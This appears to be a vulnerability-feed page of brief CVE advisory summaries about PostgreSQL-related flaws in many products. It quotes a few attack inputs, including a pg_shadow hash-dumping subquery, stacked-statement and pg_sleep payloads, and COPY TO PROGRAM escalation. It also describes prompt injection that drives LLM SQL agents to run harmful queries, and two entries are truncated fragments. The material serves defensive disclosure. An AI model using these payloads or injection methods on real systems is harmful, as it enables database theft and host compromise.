PostgreSQL
Monthly
SQL injection in listmonk's subscriber export endpoint prior to version 6.2.0 allows a highly-privileged authenticated user to read arbitrary PostgreSQL database tables - including users and settings - and execute data-modifying CTEs. The GET /api/subscribers/export endpoint passed a user-controlled query parameter directly into QuerySubscribersForExport in internal/core/subscribers.go without invoking the validateQueryTables guard that the sibling GET /api/subscribers endpoint correctly applies, creating a bypass of the allowlist-based table restriction. Exploitation requires possession of both the subscribers:sql_query and subscribers:get_all permissions; no public exploit code has been identified at time of analysis.
Command injection in NocoBase's @nocobase/plugin-backups prior to v2.1.19 allows an authenticated backup-management user to execute arbitrary OS commands as the NocoBase server process by restoring a crafted backup archive. The database.schema field from a backup's _metadata.json is interpolated directly into a shell command string passed to Node.js child_process.exec(), a classic CWE-78 pattern that bypasses any sanitization at the shell level. No active exploitation confirmed (not in CISA KEV) and no public exploit identified at time of analysis, but the commit diff confirms the mechanism is straightforward and the fix is available in v2.1.19.
SQL injection in NocoBase's @nocobase/plugin-notification-in-app-message (before 2.0.61) lets any signed-up authenticated user reach GET /api/myInAppChannels:list and inject into the filter[latestMsgReceiveTimestamp][$lt] parameter, which is concatenated into a Sequelize.literal() template with no escaping or parameter binding. Because PostgreSQL permits stacked statements through this sink, an attacker can run arbitrary SQL and escalate to operating-system command execution via COPY ... TO PROGRAM. No public exploit identified at time of analysis and the flaw is not in CISA KEV, but the code fix and regression tests are public in the vendor commit, and the vendor rates it CVSS 10.0.
PostgreSQL password hash disclosure in NocoBase 2.0.59 and earlier allows an authenticated administrator to extract pg_shadow credential hashes and database metadata by submitting raw SQL queries that reference system catalog tables omitted from the checkSQL() keyword blacklist. The SQL Collection plugin's blocklist-based validation failed to restrict pg_shadow, pg_roles, pg_stat_activity, and information_schema, and the commit diff confirms the bypass also worked via subquery wrapping (e.g., SELECT * FROM (SELECT usename, passwd FROM pg_shadow) AS passwords). No public exploit identified at time of analysis, and this CVE is not listed in CISA KEV; a vendor-released patch is available in v2.1.0-alpha.46.
SQL injection in DataEase before 2.10.23 lets an authenticated low-privilege user compromise the backend datasource by abusing the datasource connection-status check, where io.dataease.datasource.provider.CalciteProvider#checkStatus concatenates the user-controlled configuration.getSchema() value into getTablesSql and runs it via executeQuery. Because the schema/owner string is embedded directly into metadata queries for DB2, SQL Server, PostgreSQL, Oracle and other datasources, an attacker who can create or edit a datasource can inject arbitrary SQL and read or alter data on the connected database. There is no public exploit identified at time of analysis and it is not in CISA KEV, but the root cause is confirmed by the vendor commit that replaces string concatenation with parameterized PreparedStatements.
Blind SQL injection in decidim-admin's organization user search endpoint allows authenticated organization administrators to execute arbitrary PostgreSQL expressions inside an ORDER BY clause via the `term` query parameter. The flaw spans decidim-admin versions prior to 0.30.9, 0.31.5, and 0.32.0, and is exploitable using time-based payloads such as `pg_sleep` that return HTTP 200 while leaking data through measurable response-time deltas. No public exploit tool is identified at time of analysis and the vulnerability is not in CISA KEV, but the advisory provides working reproduction steps with a concrete payload, confirming practical exploitability.
Unauthenticated API key metadata disclosure in Capgo before 12.128.2 stems from the find_apikey_by_value PostgreSQL function being marked SECURITY DEFINER and granted to the anon role, allowing anyone to call it through the PostgREST endpoint /rest/v1/rpc/find_apikey_by_value. When supplied a valid key value, an attacker retrieves sensitive metadata about that key - user_id, mode, organization scoping, and expiration details - bypassing normal row-level security. Reported by VulnCheck with CVSS 4.0 8.7 (High); no public exploit identified at time of analysis and it is not listed in CISA KEV.
SQL injection in the Coturn TURN/STUN server's HTTPS admin panel (versions prior to 4.12.0) allows an authenticated administrator to inject arbitrary SQL via the du, ds, and dip query parameters of the delete-user, delete-secret, and delete-IP operations, yielding full backend database control and, on PostgreSQL deployments, OS-level command execution through COPY TO PROGRAM. The admin panel's parameters are interpolated into queries with snprintf while bypassing the is_secure_string filter that guards the STUN protocol path. No public exploit is identified at time of analysis and the flaw is not listed in CISA KEV; fixed in Coturn 4.12.0.
SQL injection in Postgrex.Notifications' reconnect replay path allows an attacker who can supply untrusted input as a PostgreSQL LISTEN channel name to corrupt the shared notification connection, silently dropping all channel subscriptions and causing persistent denial of service of the notification subsystem. Affected versions are postgrex 0.16.0 through 0.22.2 in the Elixir ecosystem. No arbitrary SQL execution is possible due to double-quote escaping, and no public exploit or CISA KEV listing exists; the CVSS 4.0 base score of 2.1 reflects the constrained, precondition-heavy impact.
Connection string injection in KEDA's PostgreSQL scaler allows low-privileged tenants to inject arbitrary libpq connection parameters by embedding tab, newline, or other non-space whitespace characters into ScaledObject or TriggerAuthentication configuration fields. The `escapePostgreConnectionParameter` function in `pkg/scalers/postgresql_scaler.go` only detects literal spaces before quoting values, leaving all other libpq token delimiters unescaped; successful exploitation forces TLS downgrade (sslmode=disable) or redirects database connections to attacker-controlled hosts to steal operator-supplied credentials. A working proof-of-concept YAML payload is included in GitHub advisory GHSA-6w3m-4hhp-775q; no CISA KEV listing was present at time of analysis.
Path traversal leading to remote code execution in Coolify (self-hosted PaaS) before 4.0.0-beta.474 allows an authenticated user to abuse insufficient filename sanitization in the PostgreSQL initialization-script generator (generate_init_scripts() in app/Actions/Database/StartPostgresql.php) to write files outside the intended directory and execute commands during database init. Any user with sufficient privileges to provision a PostgreSQL resource can escalate to code execution on the Coolify host. No public exploit identified at time of analysis, though the fix commit and security advisory publicly disclose the vulnerable code path.
Command injection in Coolify self-hosted PaaS versions prior to 4.0.0-beta.474 allows an authenticated user to run arbitrary OS commands inside the PostgreSQL database container by supplying malicious postgres_user or postgres_db values that are interpolated into shell-form healthcheck commands (CWE-78). Because the CVSS vector is PR:L/UI:N with full high impact to confidentiality, integrity, and availability, any user able to create or configure a database can achieve container-level code execution. There is no public exploit identified at time of analysis and it is not listed in CISA KEV.
Server-side file disclosure in Langroid's SQLChatAgent (Python, pip package `langroid` <= 0.65.0) lets an attacker who can influence the agent's LLM-generated SQL bypass the `_validate_query` safety guard and execute PostgreSQL file-read functions such as `pg_read_file`. The default `allow_dangerous_operations=False` blocklist relies on a raw-text regex requiring `pg_...` names to be immediately followed by `(`, which is evaded by quoted identifiers, inline comments, or schema qualification while still parsing as a permitted SELECT. This is a bypass of the earlier CVE-2026-25879 / GHSA-pmch-g965-grmr regex fix; a working reproduction harness is published in the GHSA advisory, though there is no public exploit identified as being used in active attacks and no CISA KEV listing.
Channel-binding downgrade in the pgjdbc PostgreSQL JDBC Driver (releases 42.7.4 through 42.7.11) lets an active man-in-the-middle silently strip SCRAM-SHA-256-PLUS channel binding down to plain SCRAM-SHA-256 even when the client explicitly set channelBinding=require, defeating the exact protection that setting promises. The flaw stems from the bundled com.ongres.scram:scram-client returning an empty binding for certificates whose signature algorithm lacks a tls-server-end-point hash, combined with pgJDBC's ScramAuthenticator failing to reject that empty binding. No public exploit identified at time of analysis and it is not listed in CISA KEV; it is fixed in 42.7.12.
Source-code disclosure in the Algernon web/application server (Go, xyproto/algernon, tested at v1.17.8) lets an unauthenticated remote client retrieve the raw source of any public-path server-side script on Windows hosts by appending an NTFS-equivalent suffix (::$DATA, a trailing dot, or a trailing space) to the URL. Because filepath.Ext() does an exact suffix match, these forms are not recognized as .lua/.tl/.po2/.amber/.frm and fall through to the raw-file branch, while NTFS canonicalizes the name back to the real script, exposing embedded database credentials and the SetCookieSecret value used to forge session cookies. Publicly available exploit code exists (full PoC in the GitHub advisory); no public exploit identified as actively exploited and this is not in CISA KEV.
Arbitrary file read in Langroid's SQLChatAgent (<= 0.63.0) lets an attacker who can influence the LLM-generated SQL exfiltrate files from the PostgreSQL host even under the strict default config (allow_dangerous_operations=False, allowed_statement_types=['SELECT']). The _validate_query blocklist enumerates dangerous functions by exact name and misses the pg_read_file/pg_stat_file/pg_ls_*/pg_current_logfile family (plus MSSQL OPENDATASOURCE and keyword-less SQLite ATTACH), so these SELECT-shaped payloads pass both the statement-type allowlist and the regex blocklist and reach the live SQLAlchemy engine. Publicly available exploit code exists (a working PoC ships in the GHSA advisory); no public exploit identified as actively exploited and this is not in CISA KEV.
PostgreSQL Anonymizer's anon.hash() function exposes its internal salt to masked database users through an offline brute-force attack, undermining the core pseudonymization guarantee of the extension. Masked roles - the primary consumer of this extension - can call anon.hash() with arbitrary seed inputs and accumulate (seed, hash_output) pairs to deduce the salt offline, after which all pseudonymized values in the database become reversible. No active exploitation or public proof-of-concept has been identified; a vendor-confirmed fix is available in version 3.1.2.
SQL injection in Raytha CMS 1.5.2 lets a remote, unauthenticated attacker inject arbitrary SQL through the OData filter parsing pipeline, yielding full compromise of the backing PostgreSQL database and extraction of stored credentials. The CVSS 4.0 base score is 9.3 (critical) with a fully network-reachable, no-privilege, no-interaction vector. There is no public exploit identified at time of analysis and it is not listed in CISA KEV, but the unauthenticated network-facing nature makes it a high-priority patch candidate.
Offline administrator password recovery in Kestra OSS (versions prior to 1.3.24) stems from its BasicAuth component storing the admin credential as a fast SHA-512 hash. An attacker who already holds read access to the backing PostgreSQL database can extract that hash and crack it offline at high speed, then log in as administrator; in Kubernetes deployments this further exposes the cluster ServiceAccount token and all K8s Secrets, enabling vertical privilege escalation. No public exploit identified at time of analysis and not on CISA KEV; EPSS data was not provided.
SQL injection in n8n's MySQL, PostgreSQL, and Microsoft SQL database integration nodes (all versions before 2.4.0) allows authenticated users with workflow creation permissions to execute arbitrary SQL commands against connected databases by supplying crafted identifier values - table or column names - in node configuration parameters. The nodes failed to escape SQL identifiers when constructing queries, bypassing the safety guarantees users expected from parameterized inputs and enabling injection that directly impacts downstream database confidentiality and integrity. Reported by the NATO Cyber Security Centre; vendor-released patch is confirmed in n8n 2.4.0, with no public exploit code or CISA KEV listing identified at time of analysis.
{$exists:true}`) that override the builder's intended filter, returning or altering every document in a MongoDB, CouchDB, Elasticsearch, DynamoDB-PartiQL, or JSON-body REST collection. A detailed working POC is published in the advisory; the issue is not in CISA KEV and EPSS is low (0.43%, 34th percentile), so this is publicly demonstrated but not yet confirmed as actively exploited.
Remote code execution in Gogs self-hosted Git service before 0.14.3 allows unauthenticated attackers (where self-registration is enabled) to abuse unsanitized organization names containing '../' sequences to write Git repository files outside the intended storage root, then overwrite a repository's hooks/update script and trigger arbitrary command execution as the git user. The flaw carries a CVSS 10.0 (AV:N/AC:L/PR:N/UI:N/S:C) rating, and a fully working public proof-of-concept is published alongside the GHSA advisory, though no CISA KEV listing or EPSS data is provided in the input.
Unauthenticated denial of service in Cap-go capgo (capgo-backend) before 12.128.12 allows remote attackers to exhaust PostgreSQL resources by sending unfiltered queries to the public.audit_logs PostgREST endpoint using the public anon key. Because the query planner runs expensive logic before Row-Level Security rejection, repeated requests trigger statement timeouts (error 57014) and cascade into HTTP 500 failures on unrelated endpoints such as /orgs. No public exploit identified at time of analysis, though the technique is fully described in the GHSA advisory.
Arbitrary file read in Budibase self-hosted server (@budibase/server <= 3.39.0) allows an authenticated workspace builder to exfiltrate any file readable by the server process by uploading a crafted PWA zip containing a symlink entry. Because the default `budibase/budibase:latest` Docker image runs Node as root, attackers can retrieve `/data/.env` (JWT_SECRET, INTERNAL_API_KEY, MinIO/Redis/CouchDB credentials, DATABASE_URL) and even `/etc/shadow`, enabling JWT forgery and full global-admin takeover. Publicly available exploit code exists - a complete working PoC is published in the GHSA advisory - though there is no public exploit identified at time of analysis beyond that disclosure write-up.
Unauthenticated access to Capgo's /replication HTTP endpoint exposes internal PostgreSQL replication telemetry to any remote attacker, affecting all versions prior to 12.128.2. Attackers can retrieve replication slot names, WAL LSN positions (confirmed_flush_lsn, restart_lsn), and database error messages without supplying any credentials, enabling database infrastructure reconnaissance. No public exploit code or CISA KEV listing exists at time of analysis, but the zero-complexity unauthenticated attack vector makes opportunistic scanning against internet-exposed Capgo deployments trivially feasible.
Improper input validation in ProxySQL versions 3.0.0 through 3.0.8 lets MCP callers bypass the GenAI `run_sql_readonly` tool's read-only contract by submitting multi-statement payloads such as `SELECT 1; RENAME TABLE x TO y`, which execute in full because the backend connection enables `CLIENT_MULTI_STATEMENTS`. An attacker reaching the `/mcp/query` endpoint can perform writes and administrative SQL up to the privileges of the configured MCP backend account. No public exploit identified at time of analysis, though the upstream advisory documents a successful live test against the endpoint.
Source-address spoofing in ProxySQL 2.0.0 through 3.0.8 lets any TCP peer that can reach the MySQL frontend port forge the client IP seen by the query-rule engine, bypassing routing and ACL controls. The flaw stems from incorrect parsing of the HAProxy PROXY protocol v1 `UNKNOWN` token, whose address fields the specification requires receivers to ignore. No public exploit identified at time of analysis, but the vendor advisory describes the attack mechanics in detail and version 3.0.9 ships the fix.
Pre-authentication heap memory corruption in ProxySQL 2.0.18 through 3.0.8 allows remote unauthenticated attackers to corrupt heap memory by sending a crafted first packet declaring an oversized length, which is passed directly to recv() into a fixed 32 KB input queue on both MySQL and PostgreSQL protocol listeners. The flaw carries a CVSS 9.8 rating and is fixed in 3.0.9; no public exploit identified at time of analysis, but the trivial trigger condition and out-of-bounds write primitive create strong potential for weaponization.
Stored cross-site scripting in pgAdmin 4 versions 6.0 through 9.15 allows a malicious or attacker-influenced PostgreSQL server to inject arbitrary HTML into pgAdmin's interface via ErrorResponse messages and EXPLAIN plan fields rendered through html-react-parser. Because the injection executes inside pgAdmin's own DOM, an attacker can render convincing phishing dialogs or redirect the top-level tab via iframe srcdoc, bypassing standard X-Frame-Options and frame-ancestors protections. No public exploit identified at time of analysis, but the vendor has shipped a multi-layer fix in 9.16.
Remote SQL injection via prompt injection in pgAdmin 4 versions 9.13 through 9.15 allows attackers who can write content into database objects the AI Assistant inspects to bypass the read-only transaction wrapper and execute arbitrary SQL with the pgAdmin user's database role. When that role is a PostgreSQL superuser or holds pg_execute_server_program, the chain escalates to remote code execution on the database host via COPY ... TO PROGRAM. No public exploit identified at time of analysis; CVSS 4.0 base score is 9.4 (Critical) and an upstream fix is available.
{gid}/{sid}) permits a low-privilege authenticated user with an active PostgreSQL session to inject additional SQL statements by exploiting unsafe str.format() interpolation of the user-supplied 'value' field. Affected versions span pgAdmin 4 from 1.0 through 9.15; a patch was released in version 9.16. The injected SQL executes only under the authenticated user's existing database role, so no privilege boundary is crossed - the principal risk is bypass of application-layer controls that restrict the Query Tool while leaving the restore-point endpoint accessible. No public exploit or active exploitation confirmed at time of analysis.
SQL injection in pgAdmin 4 versions 1.0 through 9.15 allows an authenticated user with object-modification rights to inject SQL via the description field of Domain, Domain Constraint, Foreign Table, Language, Event Trigger, and View dialogs, where Jinja templates wrapped the value in single quotes instead of passing it through the qtLiteral escape filter. Sixteen template sites plus ten related pgstattuple/pgstatindex identifier sinks share the defect; injected SQL executes as the connected PostgreSQL role, and if that role can use COPY ... TO/FROM PROGRAM it pivots to OS command execution on the database host. No public exploit identified at time of analysis, and the vendor notes the bug does not cross a privilege boundary since the same user already has direct SQL access via the Query Tool.
Steeltoe.Configuration.Abstractions 4.0.0-4.1.0 permanently exposes TLS client private key material to world-readable temporary files on Linux when Cloud Foundry MySQL or PostgreSQL service bindings supply SSL credentials via VCAP_SERVICES. The Connectors library writes SSL certificate, private key, and CA files to Path.GetTempPath() using File.CreateText, which on Linux creates files at mode 0644 (owner read/write, group read, world read) with no cleanup mechanism, leaving key material readable by any co-located process for the container's lifetime. Vendor-released patch 4.2.0 resolves both the permission issue (restricting new temp files to mode 0600) and the missing cleanup via IDisposable; no public exploit has been identified at time of analysis.
SQL injection in LangChain4j's langchain4j-mariadb and langchain4j-pgvector embedding stores allows authenticated attackers who can influence metadata filter keys to execute arbitrary SQL via EmbeddingSearchRequest.filter(), enabling blind data exfiltration, denial of service through sleep functions, and deletion of arbitrary rows via removeAll(Filter). The flaw stems from string-concatenated filter keys (and MariaDB string values) being placed into SQL without escaping, and is particularly relevant where filter keys originate from LLM-generated output or untrusted user input. No public exploit identified at time of analysis, though the vendor advisory documents working proof-of-concept payloads such as pg_sleep(1) injection.
Server-side request forgery in Open WebUI versions 0.9.5 and earlier allows authenticated OAuth users to read arbitrary internal HTTP responses by abusing the `_process_picture_url` function in `backend/open_webui/utils/oauth.py`, which validates only the initial URL and then permits aiohttp's default 10-redirect follow chain to reach internal addresses. The decoded response body is stored in the attacker's `profile_image_url` and retrievable via `GET /api/v1/auths/`, yielding cloud metadata credentials and access to localhost-bound services. Publicly available exploit code exists (detailed sentinel-verified PoC supplied by the reporter); no public exploit identified at time of analysis in the form of weaponized tooling, and the CVE is not on the CISA KEV list.
SQL injection in n8n's legacy Postgres v1 and TimescaleDB workflow nodes allows an authenticated workflow editor to inject and execute arbitrary SQL against the connected database, operating under the privileges of the configured database account. Affected versions span all n8n npm releases below 2.25.7 and the 2.26.0-2.26.1 range, with the CVSS 9.9 score reflecting a confirmed scope change: the injection escapes the n8n application layer into the underlying database system (S:C), enabling full confidentiality, integrity, and availability compromise of database contents. No public exploit code and no CISA KEV listing have been identified at time of analysis, but the low-privilege requirement and network-accessible attack vector make this a critical priority for any deployment where workflow editing access is broadly granted.
Unauthenticated SQL injection in NCEAS Metacat 2.0.0 through pre-3.0.0 allows remote attackers to read, modify, and execute arbitrary statements against the PostgreSQL backend by sending crafted parameters to the /harvesterRegistration endpoint. The flaw stems from string-concatenated INSERTs in HarvesterRegistration.dbInsert() combined with a missing LDAP identity check, and because the backend permits stacked queries via Statement.executeUpdate() the injection escalates to full database compromise. No public exploit identified at time of analysis, but the CVSS 9.8 vector and trivial trigger via three reachable parameters (unit, contactEmail, documentListURL) make exploitation straightforward once the endpoint is reachable.
Privilege escalation in PostgreSQL Anonymizer versions prior to 3.1.1 allows a low-privileged database user to achieve superuser execution by embedding malicious code in a crafted JSON key-value pair that is later processed by the import_database_rules() or import_roles_rules() functions when invoked by a superuser. The attack is a stored payload that requires a superuser to trigger import of attacker-controlled rules, and no public exploit identified at time of analysis. SSVC marks exploitation as none and not automatable, but technical impact is total once the trigger condition is met.
Unauthenticated arbitrary file write in Splunk Enterprise (below 10.2.4 and 10.0.7) and Splunk Cloud Platform (below 10.4.2604.3 and 10.2.2510.14) allows remote attackers to create or truncate files on the host via an unauthenticated PostgreSQL sidecar service endpoint. The CVSS 9.8 vector (AV:N/AC:L/PR:N/UI:N) reflects trivial network exploitation, and no public exploit identified at time of analysis, though the missing-auth root cause and Splunk's high-value position in enterprise SOCs makes prompt patching warranted.
Authentication bypass in dhax/go-base Go REST API boilerplate (versions prior to commit cc82b974, merged May 17, 2026) allows remote unauthenticated attackers to forge JWT tokens for arbitrary users including administrators. The signing secret is hardcoded to the literal string 'random' in both the dev.env template and as a Viper default in cmd/serve.go, and publicly available exploit code exists in the advisory. No CISA KEV listing or EPSS data is provided, but the secret is trivially derivable from the public GitHub repository.
SQL injection in Ghidra's BSim binary-similarity component (versions before 12.1) allows authenticated remote attackers to inject arbitrary SQL via filter types that concatenate user-supplied values directly into PostgreSQL queries. Successful exploitation lets an attacker read, modify, or delete contents of the backing BSim PostgreSQL database used to store function signatures. No public exploit identified at time of analysis, though a vendor security advisory has been published by NSA on GitHub.
SQL injection in Ghidra's PostgreSQL collaboration backend (versions 11.0 through pre-12.1) allows authenticated users to escalate to PostgreSQL superuser by injecting crafted username strings into ALTER ROLE statements issued by the changePassword() method. Exploitation requires only low-privileged authenticated access to the Ghidra server, and no public exploit has been identified at time of analysis despite a working proof-of-concept being implied by the detailed vendor advisory from VulnCheck and NSA.
Authorization bypass in Mem0 self-hosted server versions through 0.2.8 allows any authenticated holder of a distributed API key to overwrite the global LLM and embedder configuration via the POST /configure endpoint, redirecting all model traffic to an attacker-controlled server. The malicious configuration is persisted to PostgreSQL and survives restarts, affecting every user and API key on the instance. Publicly available exploit code exists and a vendor patch has been released in commit ae7f406.
Cross-project embedding cache leakage in grepai (versions up to 0.35.0) allows a local low-privileged authenticated user to retrieve cached PostgreSQL embedding vectors belonging to other projects by supplying a known or predicted content_hash value to the LookupByContentHash function. The underlying flaw is a missing project_id scope in the SQL query, meaning any project's embedding vectors can be retrieved by any other authenticated caller who can supply a matching hash. No public exploitation has been confirmed via CISA KEV, but proof-of-concept exploit code has been publicly disclosed per VulDB and GitHub issue #249, and a fix PR (#250) is pending acceptance.
Privilege escalation in the AWS Advanced Go Wrapper for Amazon Aurora PostgreSQL (GlobalDatabasePlugin) allows an authenticated low-privilege RDS user to gain the privileges of another user — including rds_superuser — by planting a malicious function on an untrusted search path that executes when the targeted user connects through the wrapper. The flaw is rated CVSS 4.0 8.6 (High) and requires user interaction (the victim must initiate a connection via the wrapper), with no public exploit identified at time of analysis. A vendor patch is available in release 2026-05-26.
Privilege escalation in the AWS Advanced JDBC Wrapper for Amazon Aurora PostgreSQL (versions prior to 4.0.1) allows a remote authenticated low-privilege RDS user to gain the privileges of another database user - including rds_superuser - by planting a crafted function that executes when the higher-privileged user connects to the cluster through the affected wrapper. No public exploit identified at time of analysis, and the vendor (Amazon) released a fix in version 4.0.1 on 2026-05-13 that fully qualifies function calls in PostgreSQL topology detection queries to close the search-path attack surface.
SQL injection in NocoDB's Postgres formula engine exposes authenticated creators to arbitrary SQL execution via the unvalidated `direction` argument of the `ARRAYSORT(...)` formula function. All NocoDB instances on npm/nocodb versions prior to 2026.04.1 using Postgres-backed bases are affected; MySQL and SQLite backends are not. An attacker holding creator/owner-level `columnAdd` permission can inject persistent SQL that executes during column creation and re-executes on every subsequent read of the formula column, enabling confirmed denial-of-service and potentially broader data access depending on database-level permissions. No public exploit identified at time of analysis; this vulnerability is not listed in CISA KEV.
Unauthenticated arbitrary file read in PraisonAI's MCP server (pip/PraisonAI <= 4.6.39) allows remote callers to retrieve any file readable by the host user via the praisonai.workflow.show, praisonai.workflow.validate, and praisonai.deploy.validate tool handlers. The flaw is an incomplete fix for CVE-2026-44336: a hardening helper was applied to the rules.* tools but not to these adjacent workflow/deploy handlers, and the dispatcher still forwards unvalidated kwargs to handlers. Publicly available exploit code exists (working proof-of-concept in the advisory); no public exploit identified at time of analysis as a packaged exploit, but the advisory itself ships a runnable PoC.
Remote code execution in Langroid before 0.63.0 arises because its SQLChatAgent executes SQL text generated by an LLM, and that LLM is steerable through prompt injection — including indirect injection via data returned from the database into the model's context. When the agent connects with a database role holding code-execution or filesystem privileges, an attacker who shapes the agent's input can drive emission of dialect-specific primitives like PostgreSQL's COPY ... FROM PROGRAM to run OS commands on the database host. A full working proof-of-concept (Base64-smuggled COPY FROM PROGRAM running 'id') is published in the GitHub advisory; there is no entry in CISA KEV, so this reflects publicly available exploit code rather than confirmed active exploitation.
Privilege escalation in PostgreSQL Anonymizer (all versions prior to 3.1.0) allows an authenticated database user to gain superuser privileges by embedding malicious SQL code within a column identifier of a user-created table. When a superuser invokes the k-anonymity function against such a table, the injected code executes with superuser-level privileges, yielding full confidentiality, integrity, and availability impact across the database. No active exploitation has been confirmed (not in CISA KEV) and no public exploit code has been identified at time of analysis, though SSVC rates technical impact as total due to the complete privilege escalation outcome.
Remote code execution in Twenty CRM versions 1.7.7 through 1.16.7 allows authenticated users to execute arbitrary OS commands on the database server by chaining SQL injection in the REST API groupBy endpoint with PostgreSQL's COPY TO PROGRAM functionality. The unsanitized timeZone parameter is interpolated directly into raw SQL via JavaScript template literals, and exploitation succeeds whenever the application's Postgres role holds superuser privileges. Publicly available exploit code exists per SSVC, though EPSS scoring (0.15%) suggests exploitation activity has not yet become widespread.
Supply-chain compromise of SAP's Cloud Application Programming (CAP) Node.js database packages, where trojanized versions @cap-js/sqlite@2.2.2, @cap-js/postgres@2.2.2, and @cap-js/db-service@2.10.1 were published to npm on April 29, 2026, harvesting all local credentials (npm tokens, cloud keys, SSH keys, GitHub PATs) and attempting worm-like self-propagation. Any developer or CI pipeline that installed these versions must treat every credential on the affected machine as compromised. Rated CVSS 4.0 9.3 (Critical); EPSS is low (0.03%) and it is not in CISA KEV, but the malicious code was itself actively distributed via npm — a 'mini Shai-Hulud' style attack.
Chunk-smuggling in libpng-apng's push-mode APNG parser allows a remote unauthenticated attacker to cause integrity violations and availability disruption when a victim processes a specially crafted APNG file. The flaw - classified under CWE-436 (Interpretation Conflict) - stems from incorrect sequencing of CRC finalization and frame sequence number validation for fcTL and fdAT chunks in pngpread.c, enabling maliciously ordered chunk boundaries to bypass expected parser state transitions. No public exploit code exists at time of analysis and this vulnerability is not listed in the CISA KEV catalog; however, it represents a meaningful risk for any image-processing pipeline or application accepting user-supplied APNG data from untrusted sources.
Denial of service in OpenTelemetry eBPF Instrumentation (OBI) versions prior to 0.9.0 allows remote attackers to crash the telemetry agent by sending a malformed Postgres BIND frame with an empty or unterminated portal name payload to any monitored service. The defect lives in OBI's passive Postgres protocol parser, where missing NUL-terminator validation causes a Go slice-bounds panic, halting telemetry collection on the affected node. Publicly available exploit code exists in the GHSA-pgvv-q3wf-mm9m advisory, though the issue is not listed in CISA KEV and EPSS data was not provided.
Authenticated users in Mathesar 0.2.0 through 0.9.x can access metadata for PostgreSQL databases where they lack collaborator privileges, due to missing authorization checks in four API methods (collaborators.list, tables.metadata.list, explorations.list, forms.list). Exposed data includes table schemas, saved explorations, form configurations, and critically, public form submission tokens that grant unauthorized database write access under the form's PostgreSQL role. Fixed in version 0.10.0. CVSS 5.3 (Medium) reflects network-accessible, low-complexity exploitation requiring only basic authentication. No public exploit code or active exploitation detected (EPSS data unavailable, not in CISA KEV).
Broken access control in Mathesar 0.2.0 through 0.9.x allows authenticated users to read, modify, or delete saved explorations (database query definitions) in databases where they lack collaborator privileges. Exploitation requires only a valid user account and knowledge of an exploration ID - easily guessed or enumerated. Fixed in version 0.10.0. No public exploit identified at time of analysis, with EPSS data not available for this recently disclosed vulnerability.
Budibase servers before version 3.38.1 allow any authenticated application user to modify datasource connection parameters through the REST API endpoint PUT /api/datasources/:datasourceId, which requires only basic TABLE/READ permissions instead of builder-level access. This authorization bypass enables attackers with minimal BASIC role privileges to redirect PostgreSQL, MySQL, MongoDB, or REST datasources to arbitrary hosts and ports, creating server-side request forgery (SSRF) conditions that bypass existing HTTP-layer protections for SQL driver connections. The vulnerability has been assigned CVSS 8.8 (High) and is fixed in Budibase 3.38.1.
Local privilege escalation in Rapid7 Metasploit Pro allows unprivileged Windows users to achieve SYSTEM-level execution via OpenSSL configuration file hijacking. The metasploitPostgreSQL service loads openssl.cnf from a non-existent directory writable by standard users, enabling arbitrary command execution with SYSTEM privileges. Rated CVSS 8.5 (High) with proof-of-concept exploitation status (E:P). EPSS data not yet available. Not currently listed in CISA KEV catalog, suggesting vendor-disclosed rather than observed in-the-wild exploitation at time of analysis.
SQL injection in Marten's PostgreSQL full-text search APIs allows remote unauthenticated attackers to execute arbitrary database commands when applications pass user-controlled input to the regConfig parameter. The vulnerability affects all five search method overloads (SearchAsync, PlainTextSearchAsync, PhraseSearchAsync, WebStyleSearchAsync, PrefixSearchAsync) where the regConfig parameter is interpolated directly into SQL without validation. Confirmed exploit payloads demonstrate time-based blind extraction, information disclosure via SELECT statements, and DDL execution including table drops. Vendor-released patch available in Marten 8.37.0 via GitHub PR #4343. No public exploit identified at time of analysis, though the advisory includes working proof-of-concept payloads for all affected methods.
SQL injection in n8n workflow automation platform allows an attacker with write access to a connected git repository to execute arbitrary SQL against the internal PostgreSQL database when an administrator performs a Source Control Pull. The flaw stems from unsafe handling of column names within Data Table JSON files imported during sync. No public exploit identified at time of analysis, and EPSS exploitation probability is very low at 0.04%.
SQL injection in PostgreSQL logical replication ALTER SUBSCRIPTION REFRESH PUBLICATION allows authenticated local or network users with table creation privileges to execute arbitrary SQL queries with the publication subscriber's credentials. The attack is deferred until the next REFRESH PUBLICATION command is executed, requiring user interaction or scheduled maintenance. PostgreSQL 16.x, 17.x, and 18.x versions prior to 16.14, 17.10, and 18.4 respectively are vulnerable; earlier versions are unaffected. No public exploit code or active exploitation has been identified.
Stack buffer overflow in PostgreSQL's refint module allows low-privileged database users to execute arbitrary code as the database operating system user across all supported versions before 14.23, 15.18, 16.14, 17.10, and 18.4. The vulnerability enables two distinct attack paths: direct stack overflow leading to OS-level code execution, and SQL injection when applications expose user-controlled columns configured as refint cascade primary keys. With CVSS 8.8 (AV:N/AC:L/PR:L) and network-based exploitation requiring only low-privilege database credentials, this represents a critical privilege escalation risk for PostgreSQL deployments. No active exploitation (CISA KEV) or public POC identified at time of analysis.
Buffer over-read in PostgreSQL 18.0 through 18.3 allows authenticated table maintainers to infer sensitive memory contents by exploiting mismatched array lengths in the pg_restore_attribute_stats() function during query planning. The vulnerability requires authenticated database access and table maintenance privileges but enables information disclosure without modifying data or causing service disruption.
Denial of service in PostgreSQL allows remote unauthenticated attackers to crash the database server via recursive SSL/GSS negotiation when connecting to AF_UNIX or TCP sockets (if SSL and GSS are both disabled). Affects all PostgreSQL versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. No active exploitation confirmed (not in CISA KEV). Vendor-released patches available across all supported major versions. EPSS data not available, but CVSS 7.5 (AV:N/AC:L/PR:N/UI:N) indicates high availability impact with low barrier to exploitation.
Timing-channel attack in PostgreSQL MD5 password authentication enables remote unauthenticated attackers to extract user credentials through statistical analysis of authentication response times, affecting versions prior to 18.4, 17.10, 16.14, 15.18, and 14.23. The vulnerability exploits variable-time comparison operations during MD5 password hash verification, but does not impact the default scram-sha-256 authentication method. Databases migrated from PostgreSQL 13 or earlier may retain MD5-hashed passwords and remain vulnerable despite running newer versions.
PostgreSQL libpq client library allows malicious server superusers to execute arbitrary code on connecting clients by overwriting stack buffers via unbounded responses to PQfn() calls. The vulnerability affects lo_export(), lo_read(), lo_lseek64(), and lo_tell64() functions used by psql and pg_dump utilities. A compromised or malicious PostgreSQL server can exploit clients running these common administrative tools during routine operations like database backups or large object exports. EPSS and KEV data not available for this recent CVE. CVSS 8.8 reflects the network attack vector with user interaction requirement (connecting to malicious server).
